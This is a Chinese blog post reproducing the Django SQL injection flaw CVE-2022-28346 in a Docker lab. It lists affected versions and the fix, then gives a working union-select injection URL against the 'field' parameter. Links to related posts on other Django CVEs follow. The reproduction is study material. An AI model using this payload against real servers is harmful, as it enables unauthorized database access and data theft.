Django SQL 注入漏洞 (CVE-2022-28346) 复现

原创已于 2023-03-16 15:42:35 修改 · 1k 阅读

6 ·

CC 4.0 BY-SA版权

文章标签：

#django #sql #python #web安全

于 2023-03-16 15:41:28 首次发布

代码审计与分析专栏收录该内容

19 篇文章

订阅专栏

Django SQL 注入漏洞 (CVE-2022-28346)

简介

Django 是用 Python 开发的一个免费开源的 Web 框架，几乎囊括了 Web 应用的方方面面，可以用于快速搭建高性能、优雅的网站，Django 提供了许多网站后台开发经常用到的模块，使开发者能够专注于业务部分。

影响范围

4.0 <= Django < 4.0.4

3.2 <= Django < 3.2.13

2.2 <= Django < 2.2.28

漏洞成因

攻击者使用精心编制的字典，通过**kwargs传递给QuerySet.annotate()、aggregate()和extra()这些方法，可导致这些方法在列别名中受到SQL注入攻击。

修复方法

官方已发布安全版本，下载地址：https://www.djangoproject.com/download/

环境搭建

使用dock搭建环境

docker pull s0cke3t/cve-2022-28346:latest
docker run -d -p 8080:8000  s0cke3t/cve-2022-28346

在这里插入图片描述

漏洞复现

通过报错页面可以发现存在哪些接口

在这里插入图片描述

访问接口如果存在传参，同样会提示报错信息

在这里插入图片描述

使用报错提示的参数进行sql注入

http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --

在这里插入图片描述

参考链接

https://github.com/DeEpinGh0st/CVE-2022-28346
https://github.com/django/django/commit/2044dac5c6968441be6f534c4139bcf48c5c7e48
https://www.cnvd.org.cn/flaw/show/CNVD-2022-31838

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

不要温顺地走进那个良夜

关注关注

0
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【漏洞复现】Django SQL注入漏洞 (CVE-2022-28346)

李火火的安全圈

01-01

5422

Django是用Python开发的一个免费开源的Web结构，几乎包括了Web使用方方面面，能够用于快速建立高性能、文雅的网站，Diango提供了许多网站后台开发常常用到的模块，使开发者可以专注于业务部分。攻击者使用精心编制的字典，通过 **kwargs 传递给QuerySet.annotate()、aggregate()和extra()这些方法，可导致这些方法在列别名中受到SQL注入攻击，该漏洞在2.2.28之前的Django 2.2、3.2.13之前的3.2和4.0.4之前的4.0中都存在这个问题。

[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234

qq_51577576的博客

09-30

2750

[ vulhub漏洞复现篇 ] Django JSONField/HStoreField SQL 注入漏洞 CVE-2019-14234 Django通常搭配postgresql数据库，而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现，Django的model最本质的作用是生成SQL语句，而在Django通过JSONField生成sql语句时，是通过简单的字符串拼接。

参与评论您还未登录，请先登录后发表或查看评论

Django SQL注入漏洞复现（CVE-2022-28347）

蚁景网安学院

05-18

1283

在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中发现了SQL注入问题。这是通过传递一个精心编制的字典（带有字典扩展）作为**options参数来实现的，并将注入负载放置在选项名称中。

Django1.11.4 XSS漏洞复现（CVE-2017-12794）

m0_63699746的博客

07-20

534

Django是重量级选手中最有代表性的一位。首先定义了dj错误类型数组，以及获取了db的错误类型，判断出现错误类型是否在db的错误类型中，如果存在，则将dj.exc.value.__cause__=exc.value (图上没有可能是因为在1.11.5版本下)，直接将错误的值传给__cause__，而在500页面中会输出__cause__的值。docker启动vluhub中的CVE-2017-12794的漏洞环境。新版本1.11.5，修复了1.11.4中500页面中可能存在的一个XSS漏洞。

【漏洞复现】Django -SQL注入漏洞复现(CVE-2019-14234)

过期的秋刀鱼

11-05

380

复现环境：Vulhub环境启动后，访问即可看到Django默认首页。

【漏洞复现-django-SQL注入】vulfocus/django-cve_2022_28346

10-12

1994

【django-SQL注入】可控参数注入

Python Web 框架 Django 修复SQL注入漏洞（CVE-2022-34265）

OSCS开源安全社区

07-06

1262

Django 是一个由 Python 语言编写的开源 Web 应用框架，Github 上 star 为 64.9K。Python 开发者使用 Django 可以快速开发、设计和部署网站。7月4日，OSCS 监测到 Django 官方修复了一个 SQL 注入漏洞。如果 Trunc() 方法的 kind 参数和 Extract() 方法的 lookup_name 参数没有进行安全过滤，可能会造成 SQL 注入的风险，建议各位开发者关注。......

[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042

qq_51577576的博客

09-28

2989

[ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042 Django 组件存在 SQL 注入漏洞，该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行 SQL 注入攻击，最终造成服务器敏感信息泄露。

通过Trunc（kind）和Extract（lookup_name）参数的Django潜在SQL注入（CVE-2022-34265）

一枚不知名的Java程序猿

10-02

811

CVE-2022-34265漏洞复现过程

【漏洞复现】Django _2.0.8_任意URL跳转漏洞(CVE-2018-14574)

过期的秋刀鱼

11-05

844

Django是一个广泛使用的Python web框架，它有很多方便和强大的功能。但是，像任何其他软件一样，Django也可能存在安全漏洞，这个漏洞在Django的CommonMiddleware中可能导致开放重定向。的情况下，Django没做处理，导致浏览器认为目的地址是绝对路径，最终造成任意URL跳转漏洞。 Django默认配置下，如果匹配上的URL路由中最后一位是。，Django默认会跳转到带/的请求中。Django版本

Django系列所有漏洞复现vulhubCVE-2018-14574，CVE-2022-34265，CVE-2021-35042

qq_47289634的博客

07-10

6880

Django默认配置下，如果匹配上的URL路由中最后一位是/，而用户访问的时候没加/，Django默认会跳转到带/的请求中。这个页面使用了Trunc函数来聚合页面点击数量，比如使用http://your-ip:8000/?在path开头为//example.com的情况下，Django没做处理，导致浏览器认为目的地址是绝对路径，最终造成任意URL跳转漏洞。环境启动后，访问http://your-ip:8000即可看到Django默认首页。

Django debug page XSS漏洞（CVE-2017-12794）漏洞复现

huayimy的博客

05-11

598

Django debug page XSS漏洞（CVE-2017-12794）漏洞复现

Django JSONField SQL注入漏洞复现 & 原理分析

sGanYu

05-04

2605

关于这个漏洞前几天看了很多的文章，其实大部分payload是一样的，都是如何去构造，或者去命令执行复现一下，我一开始也是这样去做的，但是这个漏洞是怎么形成的，对我来说可能一知半解，或者说完全不了解，在后面学习的过程中感觉吃力又去补习了别的知识，比如Django的两个基类，ArrayField、JSONField，Json.objects.filter()和QuerySet相关的知识，包括ORM注入等等 1/漏洞原理 PostgreSQL、SQLite3、MySQL、Oracle，在大部分情况下，以上四种

Django SQL注入漏洞（CVE-2020-7471）复现

weixin_47531489的博客

07-19

859

1 简介 Python下有许多款不同的 Web 框架。Django是重量级选手中最有代表性的一位。许多成功的网站和APP都基于Django。Django 是一个开放源代码的 Web 应用框架，由 Python 写成。Django 遵守 BSD 版权，初次发布于 2005 年 7 月, 并于 2008 年 9 月发布了第一个正式版本 1.0 。Django 采用了 MVT 的软件设计模式，即模型（Model），视图（View）和模板（Template）。 2 漏洞概述 2020年2月3日，Django

【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)

最新发布

过期的秋刀鱼

11-05

856

1.11.5版本，修复了500页面中存在的一个XSS漏洞。Django 1.11.5版本。再次刷新页面触发XSS。

Django SQL注入漏洞复现(CVE-2021-35042)

又菜又爱倒腾的博客

10-29

7266

#Django SQL注入漏洞(CVE-2021-35042)# 一、漏洞简介 Django是一个开放源代码的Web应用框架，由Python写成。采用了MVC的框架模式，即模型M，视图V和控制器C。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的，即是CMS（内容管理系统）软件。 Django 组件存在 SQL 注入漏洞，该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行 SQL 注入攻击，最终造成服务器

Django SQL注入漏洞复现（CVE-2021-35042）

xiaobai_20190815的博客

04-08

6881

一、漏洞介绍 Django 组件存在 SQL 注入漏洞，该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行 SQL 注入攻击，最终造成服务器敏感信息泄露。利用方式：1、用户认证：不需要用户认证 2、触发方式：远程，属于高危漏洞。二、影响版本 Django 3.2 Django 3.1 三、源码分析在add_ordering()函数中，进行如下了五个判断：字段中是否带点、字段是否为问号、字段开头是否

CVE-2021-35042 Django QuerySet.order_by() SQL注入漏洞复现

ierciyuan的博客

08-07

977

CVE-2021-35042 Django QuerySet.order_by() SQL注入漏洞复现。

复现CVE-2017-7233（Django url跳转漏洞）

记录并分享学习安全的知识点..

04-14

6125

警告请勿使用本文提到的内容违反法律。本文不提供任何担保。一、url跳转漏洞介绍由于web应用越来越多的需要和其他的第三方应用交互，以及在自身应用内部根据不同的逻辑将用户引向到不同的页面，譬如一个典型的登录接口就经常需要在认证成功之后将用户引导到登录之前的页面，整个过程中如果实现不好就可能导致一些安全问题，特定条件下可能引起严重的安全漏洞。二、url跳转的几种方式 1. META标签内跳转 2. javascript跳转 3. header头跳转 ...

CVE-2022-34265

07-28

回答: CVE-2022-34265是一个影响Django的SQL注入漏洞。该漏洞存在于Trunc()方法的kind参数和Extract()方法的lookup_name参数未进行安全过滤的情况下，攻击者可以利用这个漏洞进行SQL注入攻击。\[2\]该漏洞的影响等级被评定为高危，但利用成本较低。受影响的版本是(∞, 3.2.14)和\[4.0, 4.0.6)，官方已经在4.0.6和3.2.14版本中修复了这个问题。\[2\]如果你想复现这个漏洞，你可以选择一个名为CVE-2022-34265的漏洞文件夹，然后运行docker-compose up -d命令来加载漏洞环境。\[1\]你可以通过docker-compose ps命令查看环境所在的端口号，通常是8000。\[1\]然后你可以在浏览器中输入http://your-ip:8000来访问漏洞环境。\[3\]在页面上，你会看到time和count两个参数。你可以通过修改date参数的值来触发漏洞。\[3\]需要注意的是，官方已经发布了修复此漏洞的安全更新，建议开发者及时更新Django版本以避免受到攻击。\[2\] #### 引用[.reference_title] - *1* *3* [通过Trunc（kind）和Extract（lookup_name）参数的Django潜在SQL注入（CVE-2022-34265）](https://blog.youkuaiyun.com/weixin_58320878/article/details/127138812)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Python Web 框架 Django 修复SQL注入漏洞（CVE-2022-34265）](https://blog.youkuaiyun.com/murphysec/article/details/125697351)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]